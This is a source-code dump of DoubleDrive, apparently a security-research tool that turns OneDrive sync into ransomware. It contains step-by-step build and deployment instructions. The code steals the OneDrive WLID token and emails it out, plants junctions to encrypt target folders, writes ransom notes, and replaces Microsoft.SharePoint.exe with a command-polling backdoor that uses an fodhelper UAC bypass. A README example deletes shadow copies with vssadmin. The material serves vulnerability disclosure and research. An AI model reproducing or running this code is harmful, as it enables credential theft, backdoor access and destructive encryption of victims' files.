| ``` 9 | 2. Use `config_setup.py` to setup the exact configuration you want for the ransomware. For example: 10 | ```cmd 11 | python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop 12 | ``` 13 | 3. While you are in the onedrive_doubledrive folder, run: 14 | ```cmd 15 | pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\onedrive_doubledrive.py 16 | ``` 17 | In case you mentioned the `--onedrive-binaries-junction` flag in the previous stage then you should also run: 18 | ```cmd 19 | pyinstaller --onefile --add-data "config.yaml;." .\follow_attacker_commands.py 20 | ``` 21 | 4. A folder named `dist` will be created. Inside you can find `endpoint_takeover.exe` and `onedrive_doubledrive.exe` 22 | 5. Transfer `endpoint_takeover.exe` to the victim computer and run it. This will create junctions in the OneDrive sync folder that point towards the target folders the contain files to encrypt. It will also extract the WLID token of the OneDrive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage. 23 | > Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time. 24 | 6. Execute `onedrive_doubledrive` with the preferred flags on the attacker's computer. For example: 25 | ```cmd 26 | onedrive_doubledrive.exe --remote-ransomware 27 | ``` 28 | 7. In case you passed the `--onedrive-binaries-junction` flag to the `config_setup.py` script in the configuration setup stage, then you can: 29 | 1. Replace the SharePoint executable located in OneDrive's installation folder by running: 30 | ```cmd 31 | onedrive_doubledrive.exe --replace-sharepoint 32 | ``` 33 | 2. Execute commands using the `--run-command` flag. You can also run them after a UAC bypass was executed if you add the `--command-uac-bypass` flag. For example: 34 | ```cmd 35 | onedrive_doubledrive.exe --run-command "vssadmin delete shadows /all /quiet" --command-uac-bypass 36 | ``` 37 | 38 | ## Update: SharePoint Executable Command Execution Technique 39 | As you can read in the blog post I published about this research, the technique of replacing the SharePoint executable located in OneDrive's installation folder depends on the fact that `OneDrive.exe` runs `Microsoft.SharePoint.exe` when it starts. After I created this technique, and I reported my findings to all the relevant vendors, it now seems that in newer versions of OneDrive the `Microsoft.SharePoint.exe` executable is not run anymore every time `OneDrive.exe` starts. Seems like there are other triggers for `OneDrive.exe` to run `Microsoft.SharePoint.exe`, which I have not investigated. If you wish, you can alter DoubleDrive's code to write the `follow_attacker_commands.exe` executable to the current user's startup folder instead. -------------------------------------------------------------------------------- /onedrive_doubledrive/config.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import os 3 | import sys 4 | from enum import Enum 5 | 6 | class ConfigKey(Enum): 7 | TOKEN_DST_EMAIL_ADDRESS = 1 8 | IS_TEMP_EMAIL = 2 9 | TOKEN_FILE_NAME = 3 10 | JUNCTION_NAMES_TO_TARGET_PATHS = 4 11 | SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION = 5 12 | CMD_FILE_NAME = 6 13 | QUICK_DELETE = 7 14 | ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME = 8 15 | 16 | 17 | g_configs = None 18 | def get_configs(): 19 | global g_configs 20 | if None != g_configs: 21 | return g_configs 22 | 23 | bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__))) 24 | path_to_config_file = os.path.abspath(os.path.join(bundle_dir, "config.yaml")) 25 | 26 | with open(path_to_config_file, "r") as f: 27 | configs = yaml.safe_load(f) 28 | g_configs = configs 29 | 30 | return g_configs -------------------------------------------------------------------------------- /onedrive_doubledrive/config_setup.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import os 3 | import argparse 4 | import uuid 5 | 6 | from config import ConfigKey 7 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 8 | 9 | def parse_args(): 10 | parser = argparse.ArgumentParser(description="Options setup for OneDrive DoubleDrive") 11 | 12 | group = parser.add_mutually_exclusive_group(required=True) 13 | group.add_argument("--temp-email", help="If specified, sets DoubleDrive to exfiltrate the windows live token over a temp email", action="store_true") 14 | group.add_argument("--custom-email", help="If specified, sets DoubleDrive to exfiltrate the windows live token over the specified email", type=str) 15 | 16 | parser.add_argument("--quick-delete", help="If specified, starts by deleting the target files instead of overwriting them. In the end of the process, the endpoint_takeover executable will start overwriting the free space on the disk in order to make sure files cannot be recovered", action="store_true") 17 | parser.add_argument("--onedrive-binaries-junction", help="If specified, set DoubleDrive to create a junction to the installation folder of OneDrive's latest version of the target", action="store_true") 18 | parser.add_argument("--target-paths", nargs="+", help="The list of directory paths to encrypt using OneDrive", type=str, required=True) 19 | 20 | return parser.parse_args() 21 | 22 | 23 | def get_temp_email(): 24 | temp_email = TempEmail() 25 | return f"{temp_email.username}@{temp_email.domain}" 26 | 27 | 28 | def main(): 29 | args = parse_args() 30 | email_addr = None 31 | if args.temp_email: 32 | email_addr = get_temp_email() 33 | else: 34 | email_addr = args.custom_email 35 | 36 | junction_names_to_target_paths = {} 37 | for target_path in args.target_paths: 38 | junction_names_to_target_paths[str(uuid.uuid4())] = target_path 39 | 40 | config = { 41 | ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value: email_addr, 42 | ConfigKey.IS_TEMP_EMAIL.value: args.temp_email, 43 | ConfigKey.TOKEN_FILE_NAME.value: str(uuid.uuid4()), 44 | ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value: junction_names_to_target_paths, 45 | ConfigKey.SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION.value: args.onedrive_binaries_junction, 46 | ConfigKey.CMD_FILE_NAME.value: str(uuid.uuid4()), 47 | ConfigKey.QUICK_DELETE.value: args.quick_delete 48 | } 49 | if args.onedrive_binaries_junction: 50 | config[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value] = str(uuid.uuid4()) 51 | 52 | with open('config.yaml', 'w') as f: 53 | yaml.dump(config, f) 54 | 55 | 56 | 57 | if "__main__" == __name__: 58 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/endpoint_takeover.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | from config import get_configs, ConfigKey 5 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 6 | from doubledrive.endpoint_takeover_utils.reparse_points.reparse_points import create_mount_point 7 | from doubledrive.endpoint_takeover_utils.endpoint_info.onedrive.onedrive_info import get_onedrive_info 8 | from doubledrive.endpoint_takeover_utils.token_extraction.onedrive.onedrive_token_extraction import steal_onedrive_wlid_token 9 | 10 | 11 | def main(): 12 | onedrive_info = get_onedrive_info() 13 | configs = get_configs() 14 | 15 | if configs[ConfigKey.SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION.value]: 16 | junctions_names_to_target_paths = configs[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].copy() 17 | onedrive_installation_folder_junc_name = configs[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value] 18 | junctions_names_to_target_paths[onedrive_installation_folder_junc_name] = onedrive_info.version_installation_folder 19 | else: 20 | junctions_names_to_target_paths = configs[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value] 21 | 22 | print("Creating junctions to targets") 23 | for junction_name, target_path in junctions_names_to_target_paths.items(): 24 | junction_path = os.path.join(onedrive_info.sync_folder, junction_name) 25 | create_mount_point(junction_path, target_path) 26 | 27 | print("Extracting Windows Live ID token from OneDrive's logs") 28 | windows_live_token = steal_onedrive_wlid_token() 29 | if None == windows_live_token: 30 | print("Did not find the WLID token") 31 | return 1 32 | onedrive_session = OneDrive() 33 | onedrive_session.login_using_token(windows_live_token) 34 | print("Uploading token to OneDrive") 35 | onedrive_token_file_item = onedrive_session.create_file(f"/{configs[ConfigKey.TOKEN_FILE_NAME.value]}", windows_live_token) 36 | print("Sending token file to the configured email address using OneDrive API") 37 | 38 | # OneDrive has some bugs with this API request and sometimes an email is just not sent, without any indication for why. 39 | # In case that happens to you, you can just replace this exfiltration methos with another one. 40 | onedrive_session.send_item_to_email(onedrive_token_file_item, configs[ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value]) 41 | 42 | 43 | 44 | if "__main__" == __name__: 45 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/follow_attacker_commands.py: -------------------------------------------------------------------------------- 1 | import winreg 2 | import os 3 | import time 4 | import json 5 | 6 | from config import get_configs, ConfigKey 7 | 8 | def run_command_with_uac_bypass(command): 9 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 10 | with winreg.CreateKeyEx(hkcu_key, "Software\\Classes\\ms-settings\\Shell\\Open") as reg_key: 11 | winreg.SetValueEx(command_key, "DelegateExecute", 0, winreg.REG_SZ, "") 12 | 13 | with winreg.CreateKeyEx(reg_key, "command") as command_key: 14 | winreg.SetValue(command_key, None, winreg.REG_SZ, command) 15 | 16 | os.system("fodhelper.exe") 17 | 18 | def get_onedrive_sync_folder(): 19 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 20 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive\\Accounts\\Personal") as onedrive_personal_reg_key: 21 | onedrive_sync_folder = winreg.QueryValueEx(onedrive_personal_reg_key, "UserFolder")[0] 22 | return onedrive_sync_folder 23 | 24 | def main(): 25 | file_name = os.path.join(get_onedrive_sync_folder(), get_configs()[ConfigKey.CMD_FILE_NAME.value]) 26 | if os.path.exists(file_name): 27 | original_time = os.path.getmtime(file_name) 28 | else: 29 | original_time = 0 30 | 31 | while(True): 32 | if os.path.exists(file_name) and os.path.getmtime(file_name) > original_time: 33 | with open(file_name, "r") as f: 34 | cmd_json = json.load(f) 35 | original_time = os.path.getmtime(file_name) 36 | command = cmd_json.get("command", None) 37 | if None == command: 38 | continue 39 | if cmd_json.get("uac", False): 40 | run_command_with_uac_bypass(command) 41 | else: 42 | os.system(command) 43 | time.sleep(1) 44 | 45 | 46 | if "__main__" == __name__: 47 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/onedrive_doubledrive.py: -------------------------------------------------------------------------------- 1 | import json 2 | import argparse 3 | import urllib 4 | import requests 5 | import re 6 | 7 | from config import get_configs, ConfigKey 8 | from doubledrive.cloud_ransomware.onedrive_ransomware import OneDriveRansomware 9 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 10 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 11 | from doubledrive.cloud_drive.onedrive.onedrive_item import OneDriveFileItem 12 | 13 | SHAREPOINT_REPLACEMENT_EXE_NAME = "follow_attacker_commands.exe" 14 | 15 | def save_token_in_cache(drive_id, token): 16 | with open(f"{drive_id}.cache", "w") as f: 17 | return f.write(token) 18 | 19 | 20 | def get_token_from_temp_email(): 21 | temp_email = TempEmail(get_configs()[ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value]) 22 | messages = temp_email.get_messages() 23 | if 0 == len(messages): 24 | raise LookupError("The temp email's inbox is empty. Try again in 1-2 minutes") 25 | last_message = messages[0] 26 | re_match = re.search("\"https://1drv.ms.*?\"", last_message.content) 27 | url = re_match.group().replace("\"", "") 28 | html_text= requests.get(url).text 29 | search_url = "\"https\\\\u003a\\\\u002f\\\\u002fonedrive.live.com.*?\"" 30 | re_match = re.search(search_url, html_text) 31 | file_url = re_match.group().replace("\"", "").encode('utf-8').decode('unicode_escape') 32 | file_url_params = urllib.parse.parse_qs(urllib.parse.urlparse(file_url).query) 33 | onedrive_file_auth_key = file_url_params["authkey"][0] 34 | onedrive_file_id = file_url_params["id"][0] 35 | onedrive_file_drive_id = file_url_params["cid"][0] 36 | onedrive_session = OneDrive() 37 | windows_live_token = onedrive_session.read_shared_file_content(onedrive_file_drive_id, onedrive_file_id, onedrive_file_auth_key).decode() 38 | return windows_live_token 39 | 40 | 41 | def login_according_to_args(args, onedrive_session: OneDrive): 42 | if args.use_saved_token: 43 | with open(args.use_saved_token, "r") as f: 44 | token = f.read() 45 | onedrive_session.login_using_token(token) 46 | else: 47 | token = get_token_from_temp_email() 48 | onedrive_session.login_using_token(token) 49 | save_token_in_cache(onedrive_session.get_drive_id(), token) 50 | 51 | 52 | def get_target_onedrive_items(onedrive_session: OneDrive): 53 | all_onedrive_files_to_encrypt = [] 54 | for item in get_configs()[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].keys(): 55 | onedrive_junction_item = onedrive_session.get_item_by_path(f"/{item}") 56 | onedrive_junction_children = onedrive_session.list_children_recursively(onedrive_junction_item) 57 | items_to_encrypt = [item for item in onedrive_junction_children if isinstance(item, OneDriveFileItem)] 58 | all_onedrive_files_to_encrypt.extend(items_to_encrypt) 59 | 60 | return all_onedrive_files_to_encrypt 61 | 62 | 63 | def parse_args(): 64 | parser = argparse.ArgumentParser(description="DoubleDrive - Turns the original OneDrive.exe into a ransomware") 65 | parser.add_argument("--remote-ransomware", help="If specified, encrypts all the remote files under the directories that were targeted with options_setup.py", action="store_true") 66 | parser.add_argument("--key-path", default="./key.key", help="Path of the file to save the Fernet encryption/decryption key in, defaults to './key.key'") 67 | parser.add_argument("--ransom-note", default="PAY ME MONEY", help="A note to write in the ransom note, defaults to 'PAY ME MONEY'") 68 | parser.add_argument("--ransom-note-name", default="RANSOM_NOTE.txt", help="name of the ransom note that is created in each target folder, defaults to 'RANSOM_NOTE.txt'") 69 | parser.add_argument("--replace-sharepoint", help="If specified, replaces Microsoft.SharePoint.exe which is part of OneDrive's binaries with an executable that executes attacker's commands", action="store_true") 70 | parser.add_argument("--sharepoint-replacement-exe-path", default=f"./{SHAREPOINT_REPLACEMENT_EXE_NAME}", help=f"The path of the executable that is will be used in case the --replace-sharepoint flag was given. Defaults to \"./{SHAREPOINT_REPLACEMENT_EXE_NAME}\"", action="store_true") 71 | 72 | group = parser.add_mutually_exclusive_group(required=False) 73 | group.add_argument("--use-saved-token", help="Path to a file that contains a Windows ID Live token to use") 74 | 75 | parser.add_argument("--run-command", help="A command to pass to the malicious executable that replaces SharePoint's executable on the endpoint") 76 | parser.add_argument("--command-uac-bypass", help="If specified, first bypasses UAC on the target and then runs the command given in --run-command", action="store_true") 77 | args = parser.parse_args() 78 | 79 | return args 80 | 81 | 82 | def main(): 83 | args = parse_args() 84 | configs = get_configs() 85 | onedrive_session = OneDrive() 86 | login_according_to_args(args, onedrive_session) 87 | 88 | if args.replace_sharepoint: 89 | with open(args.sharepoint_replacement_exe_path, "rb") as f: 90 | malicious_exe = f.read() 91 | sharepoint_exe_onedrive_item = onedrive_session.get_item_by_path(f"/{configs[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value]}/Microsoft.SharePoint.exe") 92 | onedrive_session.modify_file_content(sharepoint_exe_onedrive_item, malicious_exe) 93 | 94 | if args.run_command: 95 | cmd_dict = { 96 | "uac": args.command_uac_bypass, 97 | "command": args.run_command 98 | } 99 | onedrive_session.create_file(f"/{configs[ConfigKey.CMD_FILE_NAME.value]}", json.dumps(cmd_dict).encode(), modify_if_exists=True) 100 | 101 | if args.remote_ransomware: 102 | onedrive_ransomware = OneDriveRansomware(onedrive_session, args.key_path) 103 | all_onedrive_files_to_encrypt = get_target_onedrive_items(onedrive_session) 104 | onedrive_ransomware.start_ransomware(all_onedrive_files_to_encrypt, quick_delete=configs[ConfigKey.QUICK_DELETE.value]) 105 | 106 | # Create ransom notes 107 | for item in get_configs()[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].keys(): 108 | onedrive_junction_item = onedrive_session.get_item_by_path(f"/{item}") 109 | ransom_note_path = f"{onedrive_junction_item.full_path}/{args.ransom_note_name}" 110 | onedrive_session.create_file(ransom_note_path, args.ransom_note) 111 | 112 | 113 | 114 | 115 | if "__main__" == __name__: 116 | main() -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | construct==2.10.68 2 | cryptography==41.0.3 3 | minidump==0.0.21 4 | psutil==5.9.5 5 | pycryptodome==3.18.0 6 | PyYAML==6.0.1 7 | Requests==2.31.0 8 | setuptools==65.5.0 9 | pywin32==306 10 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | 3 | with open("requirements.txt") as f: 4 | required = f.read().splitlines() 5 | setup( 6 | name="DoubleDrive", 7 | version="1.0", 8 | package_dir={"": "src"}, # Optional 9 | packages=find_packages(where="src"), # Required 10 | install_requires=required) 11 | -------------------------------------------------------------------------------- /src/doubledrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/cloud_drive.py: -------------------------------------------------------------------------------- 1 | import os 2 | from abc import ABC, abstractmethod, ABCMeta 3 | from dataclasses import dataclass 4 | 5 | 6 | @dataclass 7 | class CloudDriveItem: 8 | """ 9 | A generic item in a cloud drive service. Can be a file or a directory. 10 | """ 11 | name: str 12 | full_path: str 13 | 14 | def __init__(self, full_path: str) -> None: 15 | self.full_path = full_path 16 | if "/" == full_path: 17 | self.name = "/" 18 | else: 19 | self.name = os.path.basename(full_path) 20 | 21 | @dataclass 22 | class CloudDriveFolderItem(CloudDriveItem): 23 | """ 24 | A folder item in a cloud drive service. 25 | """ 26 | def __init__(self, full_path: str) -> None: 27 | super().__init__(full_path) 28 | 29 | @dataclass 30 | class CloudDriveFileItem(CloudDriveItem): 31 | """ 32 | A file item in a cloud drive service. 33 | """ 34 | def __init__(self, full_path: str) -> None: 35 | super().__init__(full_path) 36 | 37 | 38 | class ICloudDriveSession(ABC): 39 | """ 40 | An interface that represents a session with a cloud drive service. 41 | """ 42 | @abstractmethod 43 | def create_file(self, file_path: str, file_content: bytes, modify_if_exists: bool = False) -> CloudDriveFileItem: 44 | """ 45 | Creates a file in the cloud storage of the service 46 | 47 | :param file_path: The path to create the file in on the cloud storage 48 | :param file_content: The content to write into the new file 49 | :param modify_if_exists: Whether to modify the file if it already exists 50 | If False and a file exists in the given path then exception is raised 51 | 52 | :return: An instance of the created CloudDriveFileItem 53 | """ 54 | pass 55 | 56 | @abstractmethod 57 | def modify_file_content(self, cloud_file_item: CloudDriveFileItem, new_content: bytes): 58 | """ 59 | Modifies a cotent of a file on the cloud storage 60 | 61 | :param cloud_file_item: The file to modify 62 | :param new_content: The new content that will overwrite the previous content of the give file 63 | """ 64 | pass 65 | 66 | @abstractmethod 67 | def read_file_content(self, cloud_file_item: CloudDriveFileItem) -> bytes: 68 | """ 69 | Reads the content of a file from the cloud storage 70 | 71 | :param cloud_file_item: The file to read 72 | 73 | :return: The content of the file in bytes 74 | """ 75 | pass 76 | 77 | @abstractmethod 78 | def delete_item(self, cloud_item: CloudDriveItem): 79 | """ 80 | Deletes an iten from the cloud storage 81 | 82 | :param cloud_item: The item to delete on the cloud storage 83 | """ 84 | pass 85 | 86 | @abstractmethod 87 | def list_children(self, cloud_folder_item: CloudDriveFolderItem) -> list[CloudDriveItem]: 88 | """ 89 | Lists all the direct children items of a folder on the cloud storage 90 | 91 | :param cloud_folder_item: The folder to list 92 | 93 | :return: A list of all the found direct children of the given folder 94 | """ 95 | pass 96 | 97 | @abstractmethod 98 | def list_children_recursively(self, cloud_folder_item: CloudDriveFolderItem) -> list[CloudDriveItem]: 99 | """ 100 | Lists all the children items of a folder recursively on the cloud storage 101 | 102 | :param cloud_folder_item: The folder to list 103 | 104 | :return: A list of all the found children of the given folder in any depth 105 | """ 106 | pass 107 | 108 | @abstractmethod 109 | def get_item_by_path(self, item_path: str) -> CloudDriveItem: 110 | """ 111 | Returns the object of an item on the cloud storage by its path 112 | 113 | :param item_path: The path of the requested item 114 | """ 115 | pass 116 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/google_drive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/google_drive.py: -------------------------------------------------------------------------------- 1 | import os 2 | import requests 3 | 4 | from doubledrive.cloud_drive.cloud_drive import CloudDriveFolderItem, CloudDriveItem, ICloudDriveSession 5 | from doubledrive.cloud_drive.google_drive.google_drive_item import GoogleDriveItem, GoogleDriveFolderItem, GoogleDriveFileItem 6 | 7 | 8 | class GoogleDrive(ICloudDriveSession): 9 | 10 | def __init__(self) -> None: 11 | self.__http_session = requests.Session() 12 | self.__session_token = None 13 | self.__root_folder_id = None 14 | self.__root_folder_item = None 15 | self.__ids_to_paths_cache = {} 16 | 17 | def __safe_http_request(self, *args, **kwargs) -> requests.Response: 18 | res = self.__http_session.request(*args, **kwargs) 19 | res.raise_for_status() 20 | return res 21 | 22 | def __update_token(self, token): 23 | self.__session_token = token 24 | self.__http_session.headers.update({"authorization": self.__session_token}) 25 | 26 | def __get_item_json_fields(self, item_id): 27 | if item_id == self.__root_folder_id and None != self.__root_folder_item: 28 | return self.__root_folder_item.fields 29 | res = self.__safe_http_request("GET", f"https://www.googleapis.com/drive/v2internal/files/{item_id}") 30 | return res.json() 31 | 32 | def __item_json_to_path(self, google_drive_json_item: dict): 33 | if self.__get_root_folder_id() == google_drive_json_item["id"]: 34 | return "/" 35 | elif 0 == len(google_drive_json_item["parents"]): 36 | return "COMPUTERS:" + google_drive_json_item["title"] 37 | elif google_drive_json_item["id"] in self.__ids_to_paths_cache.keys(): 38 | return self.__ids_to_paths_cache[google_drive_json_item["id"]] 39 | else: 40 | path = self.__item_json_to_path(self.__get_item_json_fields(google_drive_json_item["parents"][0]["id"])) + "/" + google_drive_json_item["title"] 41 | path = path.replace("//", "/") 42 | self.__ids_to_paths_cache[google_drive_json_item["id"]] = path 43 | return path 44 | 45 | def __item_json_to_google_drive_item(self, google_drive_json_item) -> GoogleDriveItem: 46 | item_path = self.__item_json_to_path(google_drive_json_item) 47 | 48 | if google_drive_json_item["mimeType"] == "application/vnd.google-apps.folder": 49 | return GoogleDriveFolderItem(item_path, google_drive_json_item["id"], google_drive_json_item) 50 | else: 51 | return GoogleDriveFileItem(item_path, google_drive_json_item["id"], google_drive_json_item) 52 | 53 | def __query_files(self, string_query: str): 54 | params = { 55 | "q": string_query 56 | } 57 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/files", params=params) 58 | res_json = res.json() 59 | children_google_drive_items = [] 60 | next_page_exists = True 61 | while next_page_exists: 62 | for json_item in res_json["items"]: 63 | children_google_drive_items.append(self.__item_json_to_google_drive_item(json_item)) 64 | 65 | next_page_exists = None != res_json.get("nextLink", None) 66 | 67 | return children_google_drive_items 68 | 69 | def __get_root_folder_id(self) -> str: 70 | if None != self.__root_folder_id: 71 | return self.__root_folder_id 72 | 73 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/about") 74 | res_json = res.json() 75 | self.__root_folder_id = res_json["rootFolderId"] 76 | return self.__root_folder_id 77 | 78 | def login_using_token(self, token: str): 79 | self.__update_token(token) 80 | 81 | def list_children(self, google_drive_folder_item: GoogleDriveFolderItem) -> list[GoogleDriveItem]: 82 | return self.__query_files(f"trashed=false and '{google_drive_folder_item.id}' in parents") 83 | 84 | def create_file(self, file_path: str, file_content: bytes, modify_if_exists: bool = False) -> GoogleDriveFileItem: 85 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/files/generateIds?maxResults=1") 86 | res_json = res.json() 87 | new_file_id = res_json["ids"][0] 88 | 89 | parent_folder_item = self.get_item_by_path(os.path.dirname(file_path)) 90 | new_file_name = os.path.basename(file_path) 91 | params = { 92 | "id": new_file_id, 93 | "title": new_file_name, 94 | "parents": [ 95 | { 96 | "id": parent_folder_item.id 97 | } 98 | ] 99 | } 100 | res = self.__safe_http_request("POST", "https://www.googleapis.com/upload/drive/v2internal/files?uploadType=resumable", json=params) 101 | upload_url = res.headers["Location"] 102 | res = self.__safe_http_request("POST", upload_url, data=file_content) 103 | res_json = res.json() 104 | 105 | # Fixing a bug in GoogleDrive API, a bad downloadUrl is returned after file creation 106 | if "downloadUrl" in res_json.keys(): 107 | res_json["downloadUrl"] = res_json["downloadUrl"].replace("www.googleapis.comhttps:", "www.googleapis.com") 108 | 109 | return self.__item_json_to_google_drive_item(res_json) 110 | 111 | 112 | def modify_file_content(self, google_drive_item: GoogleDriveFileItem, new_content: bytes): 113 | parent_folder_item = self.get_item_by_id(google_drive_item.fields["parents"][0]["id"]) 114 | params = { 115 | "originalFilename": google_drive_item.name, 116 | "parents": [ 117 | { 118 | "id": parent_folder_item.id 119 | } 120 | ] 121 | } 122 | res = self.__safe_http_request("PUT", f"https://www.googleapis.com/upload/drive/v2internal/files/{google_drive_item.id}?uploadType=resumable&convert=false", json=params) 123 | upload_url = res.headers["Location"] 124 | res = self.__safe_http_request("POST", upload_url, data=new_content) 125 | res_json = res.json() 126 | 127 | # Fixing a bug in GoogleDrive API, a bad downloadUrl is returned after file creation 128 | if "downloadUrl" in res_json.keys(): 129 | res_json["downloadUrl"] = res_json["downloadUrl"].replace("www.googleapis.comhttps:", "www.googleapis.com") 130 | 131 | return self.__item_json_to_google_drive_item(res_json) 132 | 133 | def read_file_content(self, google_drive_file_item: GoogleDriveFileItem) -> bytes: 134 | if "downloadUrl" in google_drive_file_item.fields.keys(): 135 | return self.__safe_http_request("GET", google_drive_file_item.fields["downloadUrl"]).content 136 | elif "exportLinks" in google_drive_file_item.fields.keys(): 137 | for export_type, export_link in google_drive_file_item.fields["exportLinks"].items(): 138 | if export_type.startswith("application/vnd.openxmlformats"): 139 | return self.__safe_http_request("GET", export_link).content 140 | 141 | raise RuntimeError(f"Could not find a download link for file {google_drive_file_item.full_path}") 142 | 143 | def rename_item(self, google_drive_item: GoogleDriveItem, new_name: str): 144 | params = { 145 | "title": new_name 146 | } 147 | res = self.__safe_http_request("PATCH", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}", json=params) 148 | 149 | def delete_item(self, google_drive_item: GoogleDriveItem): 150 | self.__ids_to_paths_cache.pop(google_drive_item.id) 151 | res = self.__safe_http_request("DELETE", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}") 152 | 153 | def trash_item(self, google_drive_item: GoogleDriveItem) -> GoogleDriveItem: 154 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/trash") 155 | return self.__item_json_to_google_drive_item(res.json()) 156 | 157 | def make_item_public(self, google_drive_item: GoogleDriveItem) -> str: 158 | params = { 159 | "role" : "writer", 160 | "type" : "anyone" 161 | } 162 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/permissions", json=params) 163 | 164 | def send_item_to_email(self, google_drive_item: GoogleDriveItem, email: str, role: str = "write"): 165 | params = { 166 | "value": email, 167 | "role" : "writer", 168 | "type" : "user" 169 | } 170 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/permissions", json=params) 171 | 172 | def list_children_recursively(self, google_drive_folder_item: GoogleDriveFolderItem) -> list[CloudDriveItem]: 173 | all_children_items = [] 174 | first_level_children = self.list_children(google_drive_folder_item) 175 | 176 | all_children_items.extend(first_level_children) 177 | for google_drive_child_item in first_level_children: 178 | if isinstance(google_drive_child_item, GoogleDriveFolderItem): 179 | all_children_items.extend(self.list_children_recursively(google_drive_child_item)) 180 | 181 | return all_children_items 182 | 183 | def get_item_by_path(self, item_path: str) -> GoogleDriveItem: 184 | if "/" == item_path: 185 | return self.get_root_folder_item() 186 | elif item_path.startswith("COMPUTERS:") and "/" not in item_path: 187 | return self.get_computer_folder_item_by_name(item_path) 188 | else: 189 | google_drive_parent_item = self.get_item_by_path(os.path.dirname(item_path)) 190 | path_parent_children = self.list_children(google_drive_parent_item) 191 | path_basename = os.path.basename(item_path) 192 | for child_item in path_parent_children: 193 | if path_basename == child_item.name: 194 | return child_item 195 | raise RuntimeError("Could not find Google Drive item") 196 | 197 | def get_all_items_by_path(self, item_path: str) -> list[GoogleDriveItem]: 198 | if "/" == item_path: 199 | return self.get_root_folder_item() 200 | else: 201 | found_items = [] 202 | all_google_drive_parent_items = self.get_all_items_by_path(os.path.dirname(item_path)) 203 | for google_drive_parent_item in all_google_drive_parent_items: 204 | path_parent_children = self.list_children(google_drive_parent_item) 205 | path_basename = os.path.basename(item_path) 206 | for child_item in path_parent_children: 207 | if path_basename == child_item.name: 208 | found_items.append[child_item] 209 | 210 | if 0 == len(found_items): 211 | raise RuntimeError("Could not find Google Drive item") 212 | else: 213 | return found_items 214 | 215 | def get_item_by_id(self, id: str) -> GoogleDriveItem: 216 | return self.__item_json_to_google_drive_item(self.__get_item_json_fields(id)) 217 | 218 | def get_root_folder_item(self) -> GoogleDriveFolderItem: 219 | if None != self.__root_folder_item: 220 | return self.__root_folder_item 221 | 222 | self.__root_folder_item = self.__item_json_to_google_drive_item(self.__get_item_json_fields(self.__get_root_folder_id())) 223 | return self.__root_folder_item 224 | 225 | def get_computer_folders(self) -> list[GoogleDriveFolderItem]: 226 | return self.__query_files(f"trashed=false and 'machineRoot' in folderFeatures") 227 | 228 | def get_computer_folder_item_by_name(self, name: str) -> GoogleDriveFolderItem: 229 | for computer_folder in self.get_computer_folders(): 230 | if computer_folder.name == name: 231 | return computer_folder 232 | 233 | raise RuntimeError("Could not find the computer folder") 234 | 235 | def empty_trash(self): 236 | res = self.__safe_http_request("DELETE", "https://www.googleapis.com/drive/v2/files/trash") 237 | 238 | 239 | 